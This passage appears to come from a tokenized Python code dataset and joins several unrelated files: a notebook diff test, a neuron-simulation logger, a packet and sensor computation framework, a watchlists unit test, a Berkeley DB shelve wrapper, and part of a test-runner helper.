, <EOL> } <EOL> code_item = { <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : CellComparator ( { <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT:input>' : '<STR_LIT>' , <EOL> } ) , <EOL> '<STR_LIT>' : CellComparator ( { <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT:input>' : '<STR_LIT>' , <EOL> } ) , <EOL> } <EOL> cellslist = [ <EOL> { '<STR_LIT:state>' : '<STR_LIT>' , '<STR_LIT:value>' : '<STR_LIT:foo>' } , <EOL> header_item , <EOL> code_item , <EOL> ] <EOL> result = diff_modified_items ( cellslist ) <EOL> assert <NUM_LIT:0> not in result <EOL> assert len ( result [ <NUM_LIT:1> ] ) == <NUM_LIT:5> <EOL> assert len ( result [ <NUM_LIT:2> ] ) == <NUM_LIT:3> </s>
<s> class report_results_and_logging : <EOL> def __init__ ( self , dictionaryLongitude , epochsToPrint , M , Mv , epochIndex , spikeIntervalUnformatted , dictionary , epochMsDuration ) : <EOL> self . epochsToPrint = epochsToPrint <EOL> self . dictionaryLongitude = dictionaryLongitude <EOL> self . M = M <EOL> self . Mv = Mv <EOL> self . epochIndex = epochIndex <EOL> self . spikeIntervalUnformatted = spikeIntervalUnformatted <EOL> self . dictionary = dictionary <EOL> self . epochMsDuration = epochMsDuration <EOL> print '<STR_LIT>' , self . epochIndex <EOL> SpikeNumberInEpoch = [ <NUM_LIT:0> ] * self . dictionaryLongitude <EOL> for NeuronNumber in range ( self . dictionaryLongitude ) : <EOL> for spikeOccurenceTime in self . M [ NeuronNumber ] : <EOL> if ( spikeOccurenceTime >= ( self . epochIndex * self . spikeIntervalUnformatted ) and spikeOccurenceTime < ( ( self . epochIndex * self . spikeIntervalUnformatted ) + ( self . spikeIntervalUnformatted - <NUM_LIT> ) ) ) : <EOL> SpikeNumberInEpoch [ NeuronNumber ] = SpikeNumberInEpoch [ NeuronNumber ] + <NUM_LIT:1> <EOL> self . SpikeNumberInEpoch = SpikeNumberInEpoch <EOL> def presenter ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( sum ( self . SpikeNumberInEpoch ) / self . dictionaryLongitude ) <EOL> print ( '<STR_LIT>' ) <EOL> for NeuronNumber in range ( self . dictionaryLongitude ) : <EOL> print self . dictionary . dictionary [ NeuronNumber ] [ <NUM_LIT:0> ] , '<STR_LIT::>' , self . SpikeNumberInEpoch [ NeuronNumber ] , '<STR_LIT:U+0020>' , <EOL> print ( '<STR_LIT:U+0020>' ) <EOL> SortedMvForEpoch = [ ] <EOL> for neuronIndex in range ( self . dictionaryLongitude ) : <EOL> SortedMvForEpoch . append ( sum ( self . Mv [ neuronIndex ] [ ( self . epochIndex * self . epochMsDuration ) : ( self . epochMsDuration + ( self . epochIndex * self . epochMsDuration ) ) ] ) ) <EOL> SortedMvForEpoch = sorted ( SortedMvForEpoch ) <EOL> print ( '<STR_LIT>' ) <EOL> print SortedMvForEpoch [ <NUM_LIT:3> ] - SortedMvForEpoch [ <NUM_LIT:2> ] <EOL> print ( '<STR_LIT>' ) <EOL> print SortedMvForEpoch [ <NUM_LIT:3> ] - ( sum ( SortedMvForEpoch [ <NUM_LIT:0> : ( self . dictionaryLongitude - <NUM_LIT:1> ) ] ) / ( self . dictionaryLongitude - <NUM_LIT:1> ) ) <EOL> def logger ( self , outputFile ) : <EOL> if self . epochIndex == <NUM_LIT:0> : <EOL> outputStatement = [ '<STR_LIT>' ] <EOL> outputFile . writelines ( outputStatement ) <EOL> for neuronIndex in range ( self . dictionaryLongitude ) : <EOL> priorMvInEpoch = <NUM_LIT:0> <EOL> totalPositiveMembraneMv = <NUM_LIT:0> <EOL> for MvInEpoch in self . Mv [ neuronIndex ] [ ( self . epochIndex * self . epochMsDuration ) : ( self . epochMsDuration + ( self . epochIndex * self . epochMsDuration ) ) ] : <EOL> if MvInEpoch > <NUM_LIT:0> : <EOL> totalPositiveMembraneMv = totalPositiveMembraneMv + MvInEpoch <EOL> outputStatement = [ str ( self . dictionary . dictionary [ neuronIndex ] [ <NUM_LIT:0> ] ) , '<STR_LIT:\t>' , str ( self . epochIndex ) , '<STR_LIT:\t>' , str ( totalPositiveMembraneMv ) , '<STR_LIT:\t>' , str ( self . SpikeNumberInEpoch [ neuronIndex ] ) , '<STR_LIT:\n>' ] <EOL> outputFile . writelines ( outputStatement ) </s>
<s> __version__ = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import fieldtree <EOL> class Packet ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . objects = { } <EOL> self . index = { } <EOL> self . sensors = set ( ) <EOL> Service . packet = self <EOL> def __str__ ( self ) : <EOL> objects = self . objects . iteritems ( ) <EOL> items = ( '<STR_LIT>' % ( a , b ) for a , b in objects ) <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( items ) <EOL> def object ( self , name ) : <EOL> this = ObjectName ( name ) <EOL> obj = Object ( self , { '<STR_LIT>' : this } ) <EOL> self . add ( obj ) <EOL> return obj , this <EOL> def add ( self , obj ) : <EOL> assert isinstance ( obj , Object ) <EOL> identifier = obj [ '<STR_LIT>' ] <EOL> self . objects [ identifier ] = obj <EOL> def add_sensor ( self , sensor ) : <EOL> sensor . packet = self <EOL> self . sensors . add ( sensor ) <EOL> def get ( self , n ) : <EOL> return self . objects [ n . object ] [ n . label ] <EOL> def commit ( self ) : <EOL> changeset = { } <EOL> for name , object in self . objects . iteritems ( ) : <EOL> if object . has_changes ( ) : <EOL> changeset [ name ] = object . get_changes ( ) <EOL> for name , fields in changeset . iteritems ( ) : <EOL> for key , ( label , value ) in fields . iteritems ( ) : <EOL> if isinstance ( value , set ) : <EOL> value = frozenset ( value ) <EOL> if not self . index . has_key ( key ) : <EOL> self . index [ key ] = { } <EOL> self . index [ key ] . setdefault ( value , set ( ) ) . add ( name ) <EOL> for sensor in self . sensors : <EOL> if sensor . matches ( changeset ) : <EOL> sensor . notify ( changeset ) <EOL> class Object ( fieldtree . FieldTree ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , packet , fields ) : <EOL> self . packet = packet <EOL> self . __changes = { } <EOL> self . __depth = <NUM_LIT:0> <EOL> self . __error = None <EOL> if isinstance ( fields , dict ) : <EOL> fields = fields . items ( ) <EOL> super ( Object , self ) . __init__ ( * fields ) <EOL> def __str__ ( self ) : <EOL> items = ( '<STR_LIT>' % ( a , b ( ) if computation ( b ) else b ) <EOL> for a , b in self . fields ( ) ) <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( items ) <EOL> def __getitem__ ( self , label ) : <EOL> value = super ( Object , self ) . __getitem__ ( label ) <EOL> if computation ( value ) : <EOL> self . __depth += <NUM_LIT:1> <EOL> try : value = value ( ) <EOL> except Exception , e : <EOL> if self . __error is None : <EOL> self . __error = Error ( e ) <EOL> self . __depth -= <NUM_LIT:1> <EOL> if ( self . __depth == <NUM_LIT:0> ) and ( self . __error is not None ) : <EOL> value = self . __error <EOL> self . __error = None <EOL> return value <EOL> def update ( self , fields ) : <EOL> if isinstance ( fields , dict ) : <EOL> if fields . has_key ( '<STR_LIT>' ) : <EOL> del self . packet . objects [ self [ '<STR_LIT>' ] ] <EOL> self . packet . objects [ fields [ '<STR_LIT>' ] ] = self <EOL> fields = fields . items ( ) <EOL> super ( Object , self ) . update ( fields ) <EOL> else : <EOL> super ( Object , self ) . update ( fields , ignore = '<STR_LIT>' ) <EOL> def changed ( self , * keys ) : <EOL> for key in keys : <EOL> field = self . get_field ( key ) <EOL> self . __changes [ key ] = field <EOL> def has_changes ( self ) : <EOL> return len ( self . __changes ) > <NUM_LIT:0> <EOL> def get_changes ( self ) : <EOL> changes = self . __changes . copy ( ) <EOL> self . __changes = { } <EOL> return changes <EOL> def Service ( original ) : <EOL> "<STR_LIT>" <EOL> def compute ( ) : <EOL> "<STR_LIT>" <EOL> def value ( n ) : <EOL> if n . name in Service . accessed : <EOL> raise CycleError ( "<STR_LIT>" % n . name ) <EOL> Service . accessed . add ( n . name ) <EOL> return Service . packet . get ( n ) <EOL> def evaluate ( arg ) : <EOL> if isinstance ( arg , ValueName ) : <EOL> return value ( arg ) <EOL> elif computation ( arg ) : <EOL> return arg ( ) <EOL> else : return arg <EOL> accessed = Service . accessed . copy ( ) <EOL> args = [ evaluate ( arg ) for arg in compute . args ] <EOL> result = compute . original ( * args ) <EOL> Service . accessed = accessed <EOL> return result <EOL> compute . original = original <EOL> def define ( * args ) : <EOL> "<STR_LIT>" <EOL> compute . args = args <EOL> return compute <EOL> return define <EOL> Service . packet = None <EOL> Service . accessed = set ( ) <EOL> @ Service <EOL> def Sum ( a , b ) : <EOL> return a + b <EOL> @ Service <EOL> def Interest ( a , b ) : <EOL> return a + ( a * b ) <EOL> @ Service <EOL> def Get ( a , b ) : <EOL> return a [ b ] <EOL> class Sensor ( object ) : <EOL> def __init__ ( self , obj ) : <EOL> self . packet = None <EOL> self . output = obj <EOL> self . optional_patterns = set ( ) <EOL> self . mandatory_patterns = set ( ) <EOL> self . matched = set ( ) <EOL> def optional ( self , function ) : <EOL> self . optional_patterns . add ( function ) <EOL> def mandatory ( self , function ) : <EOL> self . mandatory_patterns . add ( function ) <EOL> def matches ( self , changeset ) : <EOL> optional = set ( ) <EOL> mandatory = set ( ) <EOL> self . matched = set ( ) <EOL> for opt in self . optional_patterns : <EOL> o = [ opt ( fields ) for name , fields in changeset . iteritems ( ) ] <EOL> optional . add ( o . count ( True ) ) <EOL> if o . count ( True ) : <EOL> self . matched . add ( opt . __name__ ) <EOL> for man in self . mandatory_patterns : <EOL> m = [ man ( fields ) for name , fields in changeset . iteritems ( ) ] <EOL> mandatory . add ( m . count ( True ) ) <EOL> if m . count ( True ) : <EOL> self . matched . add ( man . __name__ ) <EOL> return any ( optional or [ True ] ) and all ( mandatory or [ True ] ) <EOL> def notify ( self , changeset ) : <EOL> self . output . update ( { '<STR_LIT>' : str ( id ( self ) ) } ) <EOL> self . output . update ( { '<STR_LIT>' : self . packet } ) <EOL> self . output . update ( { '<STR_LIT>' : self . matched } ) <EOL> class Schema ( object ) : <EOL> def __init__ ( self , ** kargs ) : <EOL> self . properties = kargs <EOL> def __call__ ( self , obj ) : <EOL> import new <EOL> for key , value in self . properties . iteritems ( ) : <EOL> function = lambda self = self , value = value : self [ value ] <EOL> method = new . instancemethod ( function , obj , type ( obj ) ) <EOL> setattr ( obj , key , method ) <EOL> return obj <EOL> class ObjectName ( str ) : <EOL> def __call__ ( self , label ) : <EOL> return ValueName ( self , label ) <EOL> class ValueName ( object ) : <EOL> def __init__ ( self , object , label ) : <EOL> self . object = object <EOL> self . label = label <EOL> self . name = object + '<STR_LIT:.>' + label <EOL> class Error ( object ) : <EOL> def __init__ ( self , e ) : <EOL> self . exception = e <EOL> def __repr__ ( self ) : <EOL> args = ( type ( self . exception ) . __name__ , str ( self . exception ) ) <EOL> return '<STR_LIT>' % args <EOL> class CycleError ( Exception ) : <EOL> "<STR_LIT>" <EOL> def computation ( obj ) : <EOL> "<STR_LIT>" <EOL> return callable ( obj ) and hasattr ( obj , '<STR_LIT>' ) <EOL> def account_test ( ) : <EOL> packet = Packet ( ) <EOL> account , this = packet . object ( '<STR_LIT>' ) <EOL> total = Sum ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) <EOL> account . update ( { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : - <NUM_LIT> , <EOL> '<STR_LIT>' : total , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : Interest ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : Interest ( total , this ( '<STR_LIT>' ) ) , <EOL> } ) <EOL> total = account [ '<STR_LIT>' ] <EOL> adjusted = account [ '<STR_LIT>' ] <EOL> account [ '<STR_LIT>' ] += <NUM_LIT:1000> <EOL> total_ = account [ '<STR_LIT>' ] <EOL> adj_ = account [ '<STR_LIT>' ] <EOL> print total , adjusted , total_ , adj_ <EOL> packet . commit ( ) <EOL> print packet . index <EOL> def cycle_test ( ) : <EOL> packet = Packet ( ) <EOL> cycle , this = packet . object ( '<STR_LIT>' ) <EOL> cycle . update ( { <EOL> '<STR_LIT>' : Sum ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : Sum ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : <NUM_LIT:0> <EOL> } ) <EOL> print cycle [ '<STR_LIT>' ] <EOL> def sensor_test ( ) : <EOL> first = Packet ( ) <EOL> example1 , this = first . object ( '<STR_LIT>' ) <EOL> example1 . update ( { <EOL> '<STR_LIT:message>' : '<STR_LIT>' <EOL> } ) <EOL> output2 , this = first . object ( '<STR_LIT>' ) <EOL> output2 . update ( { <EOL> '<STR_LIT:message>' : '<STR_LIT>' <EOL> } ) <EOL> second = Packet ( ) <EOL> example2 , this = second . object ( '<STR_LIT>' ) <EOL> example2 . update ( { <EOL> '<STR_LIT:message>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> output1 , this = second . object ( '<STR_LIT>' ) <EOL> output1 . update ( { <EOL> '<STR_LIT:message>' : '<STR_LIT>' <EOL> } ) <EOL> def example_message ( unit ) : <EOL> for label , value in unit . itervalues ( ) : <EOL> if ( label == '<STR_LIT:message>' ) and ( '<STR_LIT>' in value ) : <EOL> return True <EOL> return False <EOL> def check_id ( unit ) : <EOL> for label , value in unit . itervalues ( ) : <EOL> if ( label == '<STR_LIT>' ) : <EOL> return True <EOL> return False <EOL> sensor1 = Sensor ( output1 ) <EOL> sensor1 . mandatory ( example_message ) <EOL> first . add_sensor ( sensor1 ) <EOL> first . commit ( ) <EOL> sensor2 = Sensor ( output2 ) <EOL> sensor2 . mandatory ( example_message ) <EOL> sensor2 . mandatory ( check_id ) <EOL> second . add_sensor ( sensor2 ) <EOL> second . commit ( ) <EOL> print first . objects . keys ( ) <EOL> for name in first . objects . keys ( ) : <EOL> if '<STR_LIT>' in name : <EOL> print first . objects [ name ] <EOL> print second . objects . keys ( ) <EOL> for name in second . objects . keys ( ) : <EOL> if '<STR_LIT>' in name : <EOL> print second . objects [ name ] <EOL> print first <EOL> print second <EOL> def schema_test ( ) : <EOL> packet = Packet ( ) <EOL> account , this = packet . object ( '<STR_LIT>' ) <EOL> account . update ( { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : - <NUM_LIT> , <EOL> '<STR_LIT>' : Sum ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) <EOL> } ) <EOL> Account = Schema ( total = account . get_key ( '<STR_LIT>' ) ) <EOL> account = Account ( account ) <EOL> print account . total ( ) <EOL> def derivation_test ( ) : <EOL> packet = Packet ( ) <EOL> task1 , this = packet . object ( '<STR_LIT>' ) <EOL> task1 . update ( { <EOL> '<STR_LIT:start>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT:end>' : Sum ( this ( '<STR_LIT:start>' ) , this ( '<STR_LIT>' ) ) <EOL> } ) <EOL> print task1 <EOL> task1 [ '<STR_LIT:start>' ] = <NUM_LIT:2> <EOL> print task1 <EOL> task2 , this = packet . object ( '<STR_LIT>' ) <EOL> task2 . update ( task1 ) <EOL> task2 . update ( { <EOL> '<STR_LIT:start>' : Get ( task1 , '<STR_LIT:end>' ) <EOL> } ) <EOL> print task2 <EOL> def main ( ) : <EOL> account_test ( ) <EOL> cycle_test ( ) <EOL> sensor_test ( ) <EOL> schema_test ( ) <EOL> derivation_test ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> type = '<STR_LIT>' <EOL> packages = { <EOL> '<STR_LIT>' : { } <EOL> } <EOL> versions = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import super_mox <EOL> import watchlists <EOL> class WatchlistsTest ( super_mox . SuperMoxTestBase ) : <EOL> def setUp ( self ) : <EOL> super_mox . SuperMoxTestBase . setUp ( self ) <EOL> self . mox . StubOutWithMock ( watchlists . Watchlists , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( watchlists . Watchlists , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( watchlists . logging , '<STR_LIT:error>' ) <EOL> def testMissingWatchlistsFileOK ( self ) : <EOL> """<STR_LIT>""" <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , [ ] ) <EOL> def testGarbledWatchlistsFileOK ( self ) : <EOL> """<STR_LIT>""" <EOL> contents = '<STR_LIT>' <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> watchlists . logging . error ( super_mox . mox . IgnoreArg ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , [ ] ) <EOL> def testNoWatchers ( self ) : <EOL> contents = """<STR_LIT>""" <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , [ ] ) <EOL> def testValidWatcher ( self ) : <EOL> watchers = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> contents = """<STR_LIT>""" % watchers <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , watchers ) <EOL> def testMultipleWatchlistsTrigger ( self ) : <EOL> """<STR_LIT>""" <EOL> contents = """<STR_LIT>""" <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def testDuplicateWatchers ( self ) : <EOL> """<STR_LIT>""" <EOL> watchers = [ '<STR_LIT>' ] <EOL> contents = """<STR_LIT>""" % ( watchers , watchers ) <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , watchers ) <EOL> def testWinPathWatchers ( self ) : <EOL> """<STR_LIT>""" <EOL> watchers = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> contents = """<STR_LIT>""" % watchers <EOL> saved_sep = watchlists . os . sep <EOL> watchlists . os . sep = '<STR_LIT:\\>' <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( r'<STR_LIT>' ) <EOL> returned_watchers = wl . GetWatchersForPaths ( <EOL> [ r'<STR_LIT>' ] ) <EOL> watchlists . os . sep = saved_sep <EOL> self . assertEqual ( returned_watchers , watchers ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import unittest <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import cPickle <EOL> try : <EOL> from UserDict import DictMixin <EOL> except ImportError : <EOL> class DictMixin : pass <EOL> import db <EOL> def open ( filename , flags = db . DB_CREATE , mode = <NUM_LIT:0> <NUM_LIT> , filetype = db . DB_HASH , <EOL> dbenv = None , dbname = None ) : <EOL> """<STR_LIT>""" <EOL> if type ( flags ) == type ( '<STR_LIT>' ) : <EOL> sflag = flags <EOL> if sflag == '<STR_LIT:r>' : <EOL> flags = db . DB_RDONLY <EOL> elif sflag == '<STR_LIT>' : <EOL> flags = <NUM_LIT:0> <EOL> elif sflag == '<STR_LIT:w>' : <EOL> flags = db . DB_CREATE <EOL> elif sflag == '<STR_LIT:c>' : <EOL> flags = db . DB_CREATE <EOL> elif sflag == '<STR_LIT:n>' : <EOL> flags = db . DB_TRUNCATE | db . DB_CREATE <EOL> else : <EOL> raise db . DBError , "<STR_LIT>" <EOL> d = DBShelf ( dbenv ) <EOL> d . open ( filename , dbname , filetype , flags , mode ) <EOL> return d <EOL> class DBShelveError ( db . DBError ) : pass <EOL> class DBShelf ( DictMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dbenv = None ) : <EOL> self . db = db . DB ( dbenv ) <EOL> self . binary = <NUM_LIT:1> <EOL> def __del__ ( self ) : <EOL> self . close ( ) <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( self . db , name ) <EOL> def __len__ ( self ) : <EOL> return len ( self . db ) <EOL> def __getitem__ ( self , key ) : <EOL> data = self . db [ key ] <EOL> return cPickle . loads ( data ) <EOL> def __setitem__ ( self , key , value ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> self . db [ key ] = data <EOL> def __delitem__ ( self , key ) : <EOL> del self . db [ key ] <EOL> def keys ( self , txn = None ) : <EOL> if txn != None : <EOL> return self . db . keys ( txn ) <EOL> else : <EOL> return self . db . keys ( ) <EOL> def items ( self , txn = None ) : <EOL> if txn != None : <EOL> items = self . db . items ( txn ) <EOL> else : <EOL> items = self . db . items ( ) <EOL> newitems = [ ] <EOL> for k , v in items : <EOL> newitems . append ( ( k , cPickle . loads ( v ) ) ) <EOL> return newitems <EOL> def values ( self , txn = None ) : <EOL> if txn != None : <EOL> values = self . db . values ( txn ) <EOL> else : <EOL> values = self . db . values ( ) <EOL> return map ( cPickle . loads , values ) <EOL> def __append ( self , value , txn = None ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> return self . db . append ( data , txn ) <EOL> def append ( self , value , txn = None ) : <EOL> if self . get_type ( ) == db . DB_RECNO : <EOL> return self . __append ( value , txn = txn ) <EOL> raise DBShelveError , "<STR_LIT>" <EOL> def associate ( self , secondaryDB , callback , flags = <NUM_LIT:0> ) : <EOL> def _shelf_callback ( priKey , priData , realCallback = callback ) : <EOL> data = cPickle . loads ( priData ) <EOL> return realCallback ( priKey , data ) <EOL> return self . db . associate ( secondaryDB , _shelf_callback , flags ) <EOL> def get ( self , * args , ** kw ) : <EOL> data = apply ( self . db . get , args , kw ) <EOL> try : <EOL> return cPickle . loads ( data ) <EOL> except ( TypeError , cPickle . UnpicklingError ) : <EOL> return data <EOL> def get_both ( self , key , value , txn = None , flags = <NUM_LIT:0> ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> data = self . db . get ( key , data , txn , flags ) <EOL> return cPickle . loads ( data ) <EOL> def cursor ( self , txn = None , flags = <NUM_LIT:0> ) : <EOL> c = DBShelfCursor ( self . db . cursor ( txn , flags ) ) <EOL> c . binary = self . binary <EOL> return c <EOL> def put ( self , key , value , txn = None , flags = <NUM_LIT:0> ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> return self . db . put ( key , data , txn , flags ) <EOL> def join ( self , cursorList , flags = <NUM_LIT:0> ) : <EOL> raise NotImplementedError <EOL> class DBShelfCursor : <EOL> """<STR_LIT:U+0020>""" <EOL> def __init__ ( self , cursor ) : <EOL> self . dbc = cursor <EOL> def __del__ ( self ) : <EOL> self . close ( ) <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( self . dbc , name ) <EOL> def dup ( self , flags = <NUM_LIT:0> ) : <EOL> return DBShelfCursor ( self . dbc . dup ( flags ) ) <EOL> def put ( self , key , value , flags = <NUM_LIT:0> ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> return self . dbc . put ( key , data , flags ) <EOL> def get ( self , * args ) : <EOL> count = len ( args ) <EOL> method = getattr ( self , '<STR_LIT>' % count ) <EOL> apply ( method , args ) <EOL> def get_1 ( self , flags ) : <EOL> rec = self . dbc . get ( flags ) <EOL> return self . _extract ( rec ) <EOL> def get_2 ( self , key , flags ) : <EOL> rec = self . dbc . get ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def get_3 ( self , key , value , flags ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> rec = self . dbc . get ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def current ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_CURRENT ) <EOL> def first ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_FIRST ) <EOL> def last ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_LAST ) <EOL> def next ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_NEXT ) <EOL> def prev ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_PREV ) <EOL> def consume ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_CONSUME ) <EOL> def next_dup ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_NEXT_DUP ) <EOL> def next_nodup ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_NEXT_NODUP ) <EOL> def prev_nodup ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_PREV_NODUP ) <EOL> def get_both ( self , key , value , flags = <NUM_LIT:0> ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> rec = self . dbc . get_both ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def set ( self , key , flags = <NUM_LIT:0> ) : <EOL> rec = self . dbc . set ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def set_range ( self , key , flags = <NUM_LIT:0> ) : <EOL> rec = self . dbc . set_range ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def set_recno ( self , recno , flags = <NUM_LIT:0> ) : <EOL> rec = self . dbc . set_recno ( recno , flags ) <EOL> return self . _extract ( rec ) <EOL> set_both = get_both <EOL> def _extract ( self , rec ) : <EOL> if rec is None : <EOL> return None <EOL> else : <EOL> key , data = rec <EOL> return key , cPickle . loads ( data ) </s>
<s> import glob , os , sys , unittest , getopt , time <EOL> use_resources = [ ] <EOL> class ResourceDenied ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def is_resource_enabled ( resource ) : <EOL> """<STR_LIT>""" <EOL> if sys . _getframe ( ) . f_back . f_globals . get ( "<STR_LIT>" ) == "<STR_LIT:__main__>" : <EOL> return True <EOL> result = use_resources is not None and ( resource in use_resources or "<STR_LIT:*>" in use_resources ) <EOL> if not result : <EOL> _unavail [ resource ] = None <EOL> return result <EOL> _unavail = { } <EOL> def requires ( resource , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if sys . _getframe ( ) . f_back . f_globals . get ( "<STR_LIT>" ) == "<STR_LIT:__main__>" : <EOL> return <EOL> if not is_resource_enabled ( resource ) : <EOL> if msg is None : <EOL> msg = "<STR_LIT>" % resource <EOL> raise ResourceDenied ( msg ) <EOL> def find_package_modules ( package , mask ) : <EOL> import fnmatch <EOL> if hasattr ( package , "<STR_LIT>" ) : <EOL> path = package . __name__ . replace ( "<STR_LIT:.>" , os . path . sep ) <EOL> mask = os . path . join ( path , mask ) <EOL> for fnm in package . __loader__ . _files . iterkeys ( ) : <EOL> if fnmatch . fnmatchcase ( fnm , mask ) : <EOL> yield os . path . splitext ( fnm ) [ <NUM_LIT:0> ] . replace ( os . path . sep , "<STR_LIT:.>" ) <EOL> else : <EOL> path = package . __path__ [ <NUM_LIT:0> ] <EOL> for fnm in os . listdir ( path ) : <EOL> if fnmatch . fnmatchcase ( fnm , mask ) : <EOL> yield "<STR_LIT>" % ( package . __name__ , os . path . splitext ( fnm ) [ <NUM_LIT:0> ] ) <EOL> def get_tests ( package , mask , verbosity ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ] <EOL> skipped = [ ] <EOL> for modname in find_package_modules ( package , mask ) : <EOL> try : <EOL> mod = __import__ ( modname , globals ( ) , locals ( ) , [ '<STR_LIT:*>' ] ) <EOL> except ResourceDenied , detail : <EOL> skipped . append ( modname ) <EOL> if verbosity > <NUM_LIT:1> : <EOL> print >> sys . stderr , "<STR_LIT>" % ( modname , detail ) <EOL> continue <EOL> except Exception , detail : <EOL> print >> sys . stderr , "<STR_LIT>" % ( modname , detail ) <EOL> continue <EOL> for name in dir ( mod ) : <EOL> if name . startswith ( "<STR_LIT:_>" ) : <EOL> continue <EOL> o = getattr ( mod , name ) <EOL> if type ( o ) is type ( unittest . TestCase ) and issubclass ( o , unittest . TestCase ) : <EOL> tests . append ( o ) <EOL> return skipped , tests <EOL> def usage ( ) : <EOL> print __doc__ <EOL> return 